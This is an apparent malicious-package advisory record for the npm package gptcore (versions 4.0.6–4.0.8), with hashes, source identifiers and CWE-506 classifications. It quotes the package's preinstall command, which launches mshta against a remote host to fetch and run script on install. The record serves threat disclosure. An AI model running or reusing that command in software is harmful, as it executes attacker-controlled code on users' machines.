-= Per source details. Do not edit below this line.=-
gptcore@4.0.7 declares a preinstall lifecycle script that runs exec('cmd /c "mshta http://fixars.top"') in preinstall.js. On Windows, this fires automatically during npm install and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine. The destination is a hardcoded third-party host over plain HTTP, with no pinning, hash verification, or relationship to a legitimate publisher, and the fetched content is unrelated to any documented package purpose.
{
"malicious-packages-origins": [
{
"modified_time": "2026-07-12T20:45:58Z",
"versions": [
"4.0.6"
],
"sha256": "5a9090400e6b3b665a6b9c2fbb92d6affedfabc6fcc4352aa83ae05a5a339036",
"import_time": "2026-07-12T20:48:33.452301603Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-009755"
},
{
"modified_time": "2026-07-12T20:46:05Z",
"versions": [
"4.0.7"
],
"sha256": "c36c51510f3762d03ab5bd7132de4a65a950f410cb5771a99d4fdc9334a9c895",
"id": "IN-MAL-2026-009756",
"source": "amazon-inspector",
"import_time": "2026-07-12T20:48:33.504498296Z"
},
{
"modified_time": "2026-07-12T20:45:48Z",
"versions": [
"4.0.8"
],
"sha256": "eb1d038afd41c44c18854fdb31cdee216cb85c80e76ad73c43a2f916f0ba4d9c",
"id": "IN-MAL-2026-009754",
"source": "amazon-inspector",
"import_time": "2026-07-12T20:48:33.402823591Z"
}
]
}{
"evidence_files": [
{
"tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd",
"sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889",
"path": "preinstall.js"
}
],
"package_integrity": [
{
"hashes": {
"sha1": "d9ea412a40b039fb06addc66b8166d2fa8f37ec1",
"sha512_sri": "sha512-p9tIpLBNkia8fBvqeZNknacDz1jZ54YVtDBNQbegpzYzoeaHZDpFnSW0pXiBqOY9Asxlpo9jFmG/V8+uPUl9qA=="
},
"filename": "gptcore-4.0.8.tgz"
}
]
}
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptcore/MAL-2026-10204.json"